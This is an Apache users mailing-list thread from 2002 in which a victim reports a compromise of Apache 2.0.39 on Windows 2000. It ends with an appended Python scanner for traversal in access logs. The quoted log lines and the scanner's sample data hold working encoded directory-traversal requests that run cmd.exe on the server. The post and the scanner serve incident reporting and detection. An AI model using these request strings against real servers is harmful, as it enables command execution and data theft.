From: "craig franke"
Date: Thu, 07 Nov 2002 09:55:49 -0600
To: users@httpd.apache.org
Subject: Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?

Not sure if it is a hack... but you should probably upgrade to 2.0.43 unless you have a good reason not to... I believe there were some vulnerabilities pertaining to Windows in some of the versions between 2.0.39 and 2.0.43...

Craig

>>> jere@iki.fi 11/07/02 09:31AM >>>
Greetings!

I'm sorry if this is something that has already been discussed, I just joined the list. I tried to check out on this matter, but didn't find any info elsewhere.

I found some suspicious stuff from my computer. First, there were files named dirc.txt...dirg.txt in the root of my C:\ drive. Plus, there was a copy of Windows' cmd.exe renamed as root.exe. The txt files contained the root dir listings for the drives.

Then, I found this from my Apache log:

p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+d:>>c:\dird.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+e:>>c:\dire.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+f:>>c:\dirf.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+g:>>c:\dirg.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Then I surfed to the address mentioned in the HTTP request, finding what is apparently some pages of a German-speaking hacker (cracker?). You can type in an IP address and you can see the directory listings for the root drives for that machine. Seems it works at least with Apache 2.0.39 and Win2K that I'm running. Or was, took it offline when I found this out.

So the question is, what is all this? Have I forgotten some installation trick or what? I'm not that worried about the dir listing, but are there more harmful things that can be done this way?

No viruses on my computer, I'm running Symantec antivirus, database just updated. Also, ZoneAlarm should keep most of the unwanted guests away.

Thanks for any help,
Jere

--
Jere Knuuttila          They took one look at me and said, "Oh my god",
jere@iki.fi             get a haircut and get a real job!
+358 50 585 3949        George Thorogood - Haircut
http://jere.iki.fi

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
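A small log-scanning example, added here and not written by either poster, that decodes the percent-encoded request paths like those in the excerpt above and flags any request whose decoded path climbs above the web root (the %5c%2e%2e sequences, with backslashes treated as separators the way Windows does). The sample lines are constructed, adapted from the excerpt with the client host and referer replaced by placeholders.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format:
# host ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample, adapted from the excerpt in the post: two traversal
# requests (cmd.exe, then fetching the dropped dirc.txt) plus a benign one.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2002:18:22:49 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e'
    '%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\\dirc.txt HTTP/1.1" '
    '500 934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [26/Oct/2002:18:22:58 +0300] "GET /error/%5c%2e%2e%5c%2e%2e'
    '%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.20 - - [26/Oct/2002:18:30:00 +0300] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/4.0"',
]


def escapes_docroot(raw_path: str) -> bool:
    """True if the decoded request path (query string ignored) climbs above
    the web root. Backslashes count as separators because Windows accepts
    either, which is exactly what the %5c%2e%2e sequences rely on."""
    path = unquote(raw_path.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:          # climbed out of the document root
                return True
        else:
            depth += 1
    return False


def scan_log(lines):
    """Return (host, time, decoded request, status) for each traversal hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not escapes_docroot(m["path"]):
            continue
        decoded = unquote(m["path"]).replace("\\", "/")
        hits.append((m["host"], m["time"], decoded, int(m["status"])))
    return hits
```

Note that the 500 on the cmd.exe requests is not evidence the attempt failed: the following 200 with a non-zero size on dirc.txt shows the redirected output file was written and then served.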